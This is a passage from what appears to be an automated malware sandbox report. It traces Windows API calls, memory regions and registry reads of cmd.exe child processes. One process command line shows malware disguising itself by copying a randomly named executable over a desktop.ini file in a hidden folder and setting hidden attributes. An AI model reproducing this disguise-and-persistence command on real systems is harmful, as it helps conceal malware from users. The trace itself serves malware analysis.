GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, 
lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.322] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.322] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0207.322] GetFileType (hFile=0x4c) returned 0x1 [0207.322] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c 
[0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] GetFileType (hFile=0x4c) returned 0x1 [0207.323] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.323] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.323] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.324] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.324] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x200, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1aeff8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, 
lpOverlapped=0x0 | out: lpBuffer=0x1aeff8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1af048*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af048*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] WriteFile (in: hFile=0x4c, lpBuffer=0x1af098*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af098*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.324] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.324] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af0e8*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af0e8*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af138*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1af138*, lpNumberOfBytesWritten=0x1ae18c*=0x50, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1af188*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: 
lpBuffer=0x1af188*, lpNumberOfBytesWritten=0x1ae18c*=0x20, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] ReadFile (in: hFile=0x54, lpBuffer=0x1aefa8, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x1ae198, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesRead=0x1ae198*=0x32, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] GetFileType (hFile=0x4c) returned 0x1 [0207.325] _get_osfhandle (_FileHandle=1) returned 0x4c [0207.325] WriteFile (in: hFile=0x4c, lpBuffer=0x1aefa8*, nNumberOfBytesToWrite=0x32, lpNumberOfBytesWritten=0x1ae18c, lpOverlapped=0x0 | out: lpBuffer=0x1aefa8*, lpNumberOfBytesWritten=0x1ae18c*=0x32, lpOverlapped=0x0) returned 1 [0207.325] _get_osfhandle (_FileHandle=4) returned 0x54 [0207.325] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x1ae178 | out: lpNewFilePointer=0x0) returned 1 [0207.326] _close (_FileHandle=4) returned 0 [0207.326] FindNextFileW (in: hFindFile=0x200e80, lpFindFileData=0x1af20c | out: lpFindFileData=0x1af20c) returned 0 [0207.326] GetLastError () returned 0x12 [0207.326] FindClose (in: hFindFile=0x200e80 | out: hFindFile=0x200e80) returned 1 [0207.327] _dup2 (_FileHandleSrc=3, _FileHandleDst=1) returned 0 [0207.327] _close (_FileHandle=3) returned 0 [0207.327] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.327] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.328] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.328] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.328] _get_osfhandle 
(_FileHandle=0) returned 0x3 [0207.328] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.328] SetConsoleInputExeNameW () returned 0x1 [0207.328] GetConsoleOutputCP () returned 0x1b5 [0207.328] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.328] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.328] exit (_Code=0) Process: id = "501" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea16f20" os_pid = "0x86c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C attrib -r -s -h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & del /f /q \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" & type \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\VMFCCE~1\\XEY8d7zI.exe\" > \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\\desktop.ini\" && attrib +h \"C:\\Users\\ALLUSE~1\\PACKAG~1\\{F325F~1\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 30536 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 30537 start_va = 0x30000 end_va = 0x12ffff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 30538 start_va = 0x130000 end_va = 0x133fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000130000" filename = "" Region: id = 30539 start_va = 0x140000 end_va = 0x140fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000140000" filename = "" Region: id = 30540 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 30541 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 30542 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 30543 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 30544 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 30545 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 30594 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 30595 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 30596 start_va = 0x150000 end_va = 0x1b6fff entry_point = 0x150000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 30597 start_va = 0x220000 end_va = 0x31ffff entry_point = 0x0 region_type = private name = 
"private_0x0000000000220000" filename = "" Region: id = 30598 start_va = 0x3a0000 end_va = 0x3affff entry_point = 0x0 region_type = private name = "private_0x00000000003a0000" filename = "" Region: id = 30599 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 30600 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 30601 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 30602 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 30603 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 30604 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 30605 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 30606 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: 
"c:\\windows\\system32\\gdi32.dll") Region: id = 30607 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 30608 start_va = 0x3b0000 end_va = 0x477fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000003b0000" filename = "" Region: id = 30609 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 30610 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 30611 start_va = 0x1c0000 end_va = 0x1c6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 30612 start_va = 0x1d0000 end_va = 0x1d1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001d0000" filename = "" Region: id = 30613 start_va = 0x1e0000 end_va = 0x1e0fff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 30614 start_va = 0x1f0000 end_va = 0x1f0fff entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 30615 start_va = 0x480000 end_va = 0x580fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 30616 start_va = 0x590000 end_va = 0x118ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000590000" filename = "" Region: id = 30617 start_va = 0x1190000 end_va = 0x12f2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001190000" filename = "" Region: id = 30618 start_va = 0x1300000 end_va = 0x15cefff entry_point = 0x1300000 region_type = mapped_file name = 
"sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 698 os_tid = 0x4f4 [0207.477] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x12f87c | out: lpSystemTimeAsFileTime=0x12f87c*(dwLowDateTime=0xb07a9020, dwHighDateTime=0x1d440a9)) [0207.477] GetCurrentProcessId () returned 0x86c [0207.477] GetCurrentThreadId () returned 0x4f4 [0207.477] GetTickCount () returned 0x3a5cf [0207.477] QueryPerformanceCounter (in: lpPerformanceCount=0x12f874 | out: lpPerformanceCount=0x12f874*=26426816797) returned 1 [0207.480] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0207.480] __set_app_type (_Type=0x1) [0207.480] __p__fmode () returned 0x76b331f4 [0207.480] __p__commode () returned 0x76b331fc [0207.480] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0207.480] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0207.480] GetCurrentThreadId () returned 0x4f4 [0207.480] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0x4f4) returned 0x38 [0207.481] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0207.481] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0207.481] SetThreadUILanguage (LangId=0x0) returned 0x409 [0207.481] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0207.481] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x12f80c | out: phkResult=0x12f80c*=0x0) returned 0x2 [0207.481] VirtualQuery (in: lpAddress=0x12f843, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x12f000, AllocationBase=0x30000, AllocationProtect=0x4, 
RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x30000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x30000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x31000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x31000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x33000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x33000, AllocationBase=0x30000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0207.481] VirtualQuery (in: lpAddress=0x130000, lpBuffer=0x12f7dc, dwLength=0x1c | out: lpBuffer=0x12f7dc*(BaseAddress=0x130000, AllocationBase=0x130000, AllocationProtect=0x2, RegionSize=0x4000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0207.481] GetConsoleOutputCP () returned 0x1b5 [0207.481] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0207.482] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0207.482] _get_osfhandle (_FileHandle=1) returned 0x7 [0207.482] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0207.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.482] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0207.482] _get_osfhandle (_FileHandle=0) returned 0x3 [0207.482] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) 
returned 1 [0207.483] GetEnvironmentStringsW () returned 0x2304b0* [0207.483] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.483] GetEnvironmentStringsW () returned 0x2304b0* [0207.483] FreeEnvironmentStringsW (penv=0x2304b0) returned 1 [0207.483] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e77c | out: phkResult=0x12e77c*=0x40) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x60, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x0, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x4) returned 0x0 [0207.483] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e784, 
lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegCloseKey (hKey=0x40) returned 0x0 [0207.484] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x12e77c | out: phkResult=0x12e77c*=0x40) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x40, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, lpData=0x12e788*=0x1, lpcbData=0x12e780*=0x1000) returned 0x2 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x0, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x4, lpData=0x12e788*=0x9, lpcbData=0x12e780*=0x4) returned 0x0 [0207.484] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x12e784, lpData=0x12e788, lpcbData=0x12e780*=0x1000 | out: lpType=0x12e784*=0x0, 
